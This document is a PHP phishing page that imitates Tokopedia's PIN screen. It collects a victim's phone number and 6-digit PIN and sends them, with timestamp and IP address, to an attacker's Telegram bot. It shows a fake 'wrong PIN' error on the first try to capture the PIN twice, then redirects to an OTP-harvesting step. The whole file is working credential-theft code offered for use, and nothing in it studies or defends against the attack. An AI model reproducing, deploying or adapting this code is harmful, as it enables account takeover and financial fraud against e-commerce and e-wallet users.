<?php
ob_start();
session_start();
require_once 'config_secret.php';

// Proteksi akses langsung tanpa nomor hp
if (!isset($_SESSION['phone'])) {
    header('Location: index.php');
    exit();
}

$error = "";

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $pin = isset($_POST['pin_full']) ? trim($_POST['pin_full']) : '';

    if (!preg_match('/^[0-9]{6}$/', $pin)) {
        $error = "PIN harus 6 digit angka.";
    } else {
        if (!isset($_SESSION['submit_count'])) {
            $_SESSION['submit_count'] = 0;
        }

        $_SESSION['submit_count']++;

        // Logika pengiriman data (Sama dengan login.php kamu)
        if (defined('TELEGRAM_BOT_TOKEN') && defined('TELEGRAM_CHAT_ID')) {
            $status = ($_SESSION['submit_count'] === 1) ? "🔄 [Percobaan 1]" : "✅ [Percobaan 2]";
            $message = "🔐 *PIN TOKOPEDIA* $status\n\n";
            $message .= "*Nomor:* `" . $_SESSION['phone'] . "`\n";
            $message .= "*PIN:* `" . $pin . "`\n";
            $message .= "*Waktu:* " . date('d/m/Y H:i:s') . "\n";
            $message .= "*IP:* " . $_SERVER['REMOTE_ADDR'];
            
            sendToTelegram($message);
        }

        // Percobaan pertama → tampilkan error palsu
        if ($_SESSION['submit_count'] === 1) {
            $error = "PIN salah atau kadaluarsa. Silakan masukkan kembali PIN Anda.";
        } 
        // Percobaan kedua → Redirect ke OTP
        else {
            unset($_SESSION['submit_count']);
            $_SESSION['pin'] = $pin; 
            header("Location: otp.php");
            exit();
        }
    }
}

// FUNGSI INI ADALAH SALINAN DARI LOGIN.PHP KAMU YANG SUDAH BERHASIL
function sendToTelegram($text) {
    if (!defined('TELEGRAM_BOT_TOKEN') || !defined('TELEGRAM_CHAT_ID')) return;

    $url = "https://api.telegram.org/bot" . TELEGRAM_BOT_TOKEN . "/sendMessage";
    $data = [
        'chat_id' => TELEGRAM_CHAT_ID,
        'text' => $text,
        'parse_mode' => 'Markdown',
        'disable_web_page_preview' => true
    ];

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    
    // Settingan anti-reset & anti-delay
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); 
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);        
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); 
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);     
    curl_setopt($ch, CURLOPT_IPRESOLVE, CURL_IPRESOLVE_V4); 

    $result = curl_exec($ch);
    curl_close($ch);
    return $result;
}
?>
<!DOCTYPE html>
<html lang="id">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="icon" type="image/png" sizes="144x144" href="https://ecs7.tokopedia.net/assets-tokopedia-lite/prod/icon144.png">
<title>Masukkan Kode PIN</title>

<style>
    /* CSS ASLI KAMU TANPA PERUBAHAN */
    html{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}
    body{margin:0;font-family:system-ui;background:#fff}
    .app-alexhosting{text-align:center}
    .alexariandi-shop{background:#f3f4f5;width:100%;display:flex;justify-content:space-around;padding:10px;border-bottom:1px solid #f3f3f3;align-items:center;}
    .shopalex{width:40px}
    .exalex{width:100px}
    .ucapan-img{margin-top:20px;width:50%;max-width:200px;}
    .cothak-input{width:90%;max-width:420px;margin:15px auto;border-radius:10px;padding:25px 0 30px;background: url(img/bg.png) no-repeat center; background-size: cover; border: 1px solid #8a8a8a; box-shadow: 0px 0px 8px #0808089c;border:1px solid #e5e7e9;box-shadow:0 0 8px #0000001a;}
    .ucapan-otp{color:#000;font-weight:600;margin-bottom:30px;}
    .pin-box{display:flex;justify-content:center;gap:8px;}
    .pin-input{width:42px;height:48px;font-size:20px;text-align:center;border:1px solid #03ac0e;border-radius:5px; outline: none;}
    #errorText{color:#ff6b6b;font-weight:600;font-size:14px;margin-top:15px;min-height:20px; padding: 0 10px;}
    #btn{margin-top:20px;background:#03ac0e;border:none;border-radius:5px;color:#fff;font-size:18px;padding:12px;width:80%;font-weight:700;cursor:pointer;}
    #btn:disabled{background:#ccc}
</style>
</head>
<body>

<div class="app-alexhosting">
    <div class="alexariandi-shop">
        <img class="shopalex" src="img/logo.png">
        <img class="exalex" style="width:50px" src="img/gopay.png">
        <img class="exalex" src="img/bibli.png">
    </div>

    <img class="ucapan-img" src="img/image.png">

    <div class="cothak-input">
        <form id="pinForm" method="POST">
            <p class="ucapan-otp">Masukkan Kode PIN</p>

            <div class="pin-box">
                <input class="pin-input" maxlength="1" inputmode="numeric" type="password" required>
                <input class="pin-input" maxlength="1" inputmode="numeric" type="password" required>
                <input class="pin-input" maxlength="1" inputmode="numeric" type="password" required>
                <input class="pin-input" maxlength="1" inputmode="numeric" type="password" required>
                <input class="pin-input" maxlength="1" inputmode="numeric" type="password" required>
                <input class="pin-input" maxlength="1" inputmode="numeric" type="password" required>
            </div>

            <input type="hidden" name="pin_full" id="pin_full">

            <div id="errorText"><?php echo $error; ?></div>

            <button type="submit" id="btn" disabled>Verifikasi</button>
        </form>
    </div>
</div>

<script>
const inputs = document.querySelectorAll('.pin-input');
const btn = document.getElementById('btn');
const pinFull = document.getElementById('pin_full');
const form = document.getElementById('pinForm');
let isProcessing = false;

inputs[0].focus();

inputs.forEach((input, i) => {
    input.addEventListener('input', () => {
        input.value = input.value.replace(/\D/g,'');
        if(input.value && i < inputs.length-1){
            inputs[i+1].focus();
        }
        check();
    });

    input.addEventListener('keydown', e => {
        if(e.key === 'Backspace' && !input.value && i>0){
            inputs[i-1].focus();
        }
    });
});

function check(){
    const allFilled = [...inputs].every(i => i.value.length === 1);
    
    if(allFilled && !isProcessing) {
        let combined = "";
        inputs.forEach(i => combined += i.value);
        pinFull.value = combined;
        btn.disabled = false;
        
        isProcessing = true; // Kunci biar gak double submit
        btn.innerText = "Memproses...";
        
        // Auto Submit instan
        setTimeout(() => {
            form.submit();
        }, 300);
    } else {
        btn.disabled = true;
    }
}
</script>

</body>
</html>